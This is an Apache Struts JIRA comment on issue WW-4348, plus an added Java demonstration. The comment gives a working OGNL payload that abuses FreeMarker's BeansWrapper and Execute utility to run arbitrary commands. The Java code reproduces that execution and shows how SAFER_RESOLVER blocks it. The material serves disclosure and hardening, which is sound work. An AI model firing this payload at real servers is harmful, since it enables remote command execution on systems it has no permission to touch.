struts-issues mailing list archives

From "Markus Wulftange (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (WW-4348) Remove access to static methods
Date Thu, 05 Jan 2017 11:04:58 GMT

    [ https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15801069#comment-15801069 ]

Markus Wulftange commented on WW-4348:
--------------------------------------

Disallowing static methods isn't sufficient. With access to FreeMarker's _BeansWrapper_ instance,
it is still possible to create an instance of any class.

For example, by creating a FreeMarker _Template_ instance which utilizes the _Execute_ utility,
it is still possible to execute arbitrary commands:

{noformat}
#application["freemarker.Configuration"]["objectWrapper"].newInstance(
	#context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
	{
		#application["freemarker.Configuration"]["objectWrapper"].wrap(""),
		#application["freemarker.Configuration"]["objectWrapper"].wrap("<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}"),
		#application["freemarker.Configuration"]["objectWrapper"].wrap(#application["freemarker.Configuration"])
	}
).process(
	null,
	#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}

> Remove access to static methods
> -------------------------------
>
>                 Key: WW-4348
>                 URL: https://issues.apache.org/jira/browse/WW-4348
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core Actions
>    Affects Versions: 2.3.16.3
>            Reporter: Lukasz Lenart
>            Priority: Critical
>             Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
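The technique described in the comment above, reproduced with the plain FreeMarker API as an added example; it is not part of this JIRA thread, nor of the Struts or FreeMarker code bases. It compiles the same template source into a Template and processes it twice: once against a Configuration with the default (unrestricted) new-built-in class resolver, where the Execute utility runs the command, and once against a Configuration whose resolver is set to TemplateClassResolver.SAFER_RESOLVER, where the ?new built-in is refused. Assumptions: FreeMarker 2.3.21 or later on the classpath, and "id" as a stand-in for the attacker-chosen command.

```java
// Added example, not code from the JIRA thread or from Struts/FreeMarker.
// Assumes freemarker 2.3.21+ on the classpath; "id" stands in for the attacker's command.
import java.io.StringWriter;

import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

public class ExecuteViaNewBuiltin {

    // Identical to the template source embedded in the OGNL payload, command swapped for "id".
    static final String SRC =
        "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}";

    // What the payload does reflectively via objectWrapper.newInstance(Template.class, {...}).process(null, writer):
    // the three-argument (name, sourceCode, cfg) Template constructor, then process() with no data model.
    @SuppressWarnings("deprecation")
    static String render(Configuration cfg) throws Exception {
        Template t = new Template("", SRC, cfg);
        StringWriter out = new StringWriter();
        t.process(null, out);
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Weak: the default resolver lets ?new instantiate any TemplateMethodModel,
        // freemarker.template.utility.Execute included.
        Configuration weak = new Configuration(Configuration.VERSION_2_3_21);
        System.out.println("unrestricted: " + render(weak).trim());

        // Hardened: SAFER_RESOLVER refuses Execute, ObjectConstructor and JythonRuntime;
        // ALLOWS_NOTHING_RESOLVER refuses every class name passed to ?new.
        Configuration hard = new Configuration(Configuration.VERSION_2_3_21);
        hard.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);
        try {
            render(hard);
            System.out.println("hardened: command ran (unexpected)");
        } catch (TemplateException e) {
            // ?new on a disallowed class raises a TemplateException before any command runs
            System.out.println("hardened: ?new refused: " + e.getMessage());
        }
    }
}
```

The resolver only governs which classes ?new may instantiate inside template source. It does not address the comment's wider point that a caller holding the BeansWrapper can instantiate arbitrary classes through newInstance(), and a caller holding the Configuration object, as the payload does via #application, can also reach setNewBuiltinClassResolver(). Where templates never legitimately use ?new, ALLOWS_NOTHING_RESOLVER is the stricter choice.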
